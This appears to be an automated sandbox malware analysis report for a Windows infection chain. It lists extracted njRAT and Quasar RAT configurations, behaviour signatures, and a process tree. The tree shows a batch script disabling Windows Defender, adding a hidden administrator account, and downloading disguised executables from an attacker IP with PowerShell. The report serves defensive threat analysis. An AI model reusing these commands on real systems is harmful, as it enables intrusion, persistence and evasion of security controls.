Analysis

  • max time kernel
    250s
  • max time network
    252s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-10-2024 06:59

General

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/ngrok.yml

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/111.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/222.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/x.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/WindowsUpdate.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/ngrok.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/auto-install-hrdp.bat

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/hrdp/hrdp.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/hrdp/update.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/hrdp/autoupdate.zip

Extracted

Family

njrat

Version

0.7d

Botnet

حوالات

C2

*jYyNjI2LmRkbn*ubmV0:5552

Mutex

4e0c23218aae421528d2445f98e0e933

Attributes
  • reg_key

    4e0c23218aae421528d2445f98e0e933

  • splitter

    |'|'|

Extracted

Family

quasar

Version

1.4.0.0

Botnet

srlhost

C2

262626.ddns.net:5551

45.61.151.50:5551

Mutex

qVw3t6gtOwrpZYozK1

Attributes
  • encryption_key

    QfzNbeLbOitDzJWlP0jo

  • install_name

    spoolar.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    spooler

  • subdirectory

    printer

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 8 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 8 IoCs
  • Sets file to hidden 1 TTPs 4 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 25 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 4 IoCs
  • Drops file in System32 directory 3 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 9 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 26 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 5 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://152.89.239.119
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4304
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff0d9e46f8,0x7fff0d9e4708,0x7fff0d9e4718
      2⤵
        PID:4996
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
        2⤵
          PID:3104
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2208
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
          2⤵
            PID:5116
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
            2⤵
              PID:320
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
              2⤵
                PID:8
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
                2⤵
                  PID:712
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
                  2⤵
                    PID:4356
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1928
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
                    2⤵
                      PID:2412
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
                      2⤵
                        PID:5028
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
                        2⤵
                          PID:3196
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
                          2⤵
                            PID:4844
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
                            2⤵
                              PID:2016
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1872 /prefetch:1
                              2⤵
                                PID:2736
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
                                2⤵
                                  PID:3860
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:1
                                  2⤵
                                    PID:368
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
                                    2⤵
                                      PID:1768
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                      2⤵
                                        PID:5108
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6128 /prefetch:8
                                        2⤵
                                          PID:3164
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
                                          2⤵
                                            PID:1696
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:1
                                            2⤵
                                              PID:640
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
                                              2⤵
                                                PID:3720
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1
                                                2⤵
                                                  PID:4948
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2296 /prefetch:1
                                                  2⤵
                                                    PID:4528
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3020 /prefetch:1
                                                    2⤵
                                                      PID:2880
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
                                                      2⤵
                                                        PID:3808
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
                                                        2⤵
                                                          PID:4824
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:1
                                                          2⤵
                                                            PID:3136
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
                                                            2⤵
                                                              PID:3316
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
                                                              2⤵
                                                                PID:4884
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6592 /prefetch:8
                                                                2⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:4068
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\xdr.bat" "
                                                                2⤵
                                                                  PID:772
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Powershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'
                                                                    3⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2092
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Powershell Add-MpPreference -ExclusionPath 'c:\'
                                                                    3⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3576
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                    3⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:232
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                    3⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3380
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Powershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'
                                                                    3⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:320
                                                                  • C:\Windows\system32\net.exe
                                                                    net user t1 Raed12346@@ /add
                                                                    3⤵
                                                                      PID:5000
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 user t1 Raed12346@@ /add
                                                                        4⤵
                                                                          PID:4564
                                                                      • C:\Windows\system32\net.exe
                                                                        net localgroup administrators t1 /add
                                                                        3⤵
                                                                          PID:4504
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 localgroup administrators t1 /add
                                                                            4⤵
                                                                              PID:832
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f
                                                                            3⤵
                                                                            • Hide Artifacts: Hidden Users
                                                                            PID:3740
                                                                          • C:\Windows\system32\net.exe
                                                                            net user t1 /active:no
                                                                            3⤵
                                                                              PID:1120
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 user t1 /active:no
                                                                                4⤵
                                                                                  PID:1632
                                                                              • C:\Windows\system32\net.exe
                                                                                net user t1 /active:yes
                                                                                3⤵
                                                                                  PID:4916
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    C:\Windows\system32\net1 user t1 /active:yes
                                                                                    4⤵
                                                                                      PID:912
                                                                                  • C:\Windows\system32\ReAgentc.exe
                                                                                    reagentc.exe /disable
                                                                                    3⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Drops file in Windows directory
                                                                                    PID:3932
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
                                                                                    3⤵
                                                                                      PID:4824
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
                                                                                      3⤵
                                                                                        PID:464
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f
                                                                                        3⤵
                                                                                          PID:4068
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f
                                                                                          3⤵
                                                                                            PID:2920
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f
                                                                                            3⤵
                                                                                              PID:4816
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                                PID:4700
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                                                                                3⤵
                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                PID:4908
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f
                                                                                                3⤵
                                                                                                  PID:3360
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                                                                                  3⤵
                                                                                                    PID:2352
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f
                                                                                                    3⤵
                                                                                                      PID:852
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                      3⤵
                                                                                                        PID:3164
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')
                                                                                                        3⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4296
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/111.jpg','C:\ProgramData\Windata\smhost.exe')
                                                                                                        3⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2528
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/222.jpg','C:\ProgramData\Windata\srlhost.exe')
                                                                                                        3⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2420
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x.jpg','C:\ProgramData\Windata\winlogin.exe')
                                                                                                        3⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4480
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')
                                                                                                        3⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Command and Scripting Interpreter: PowerShell
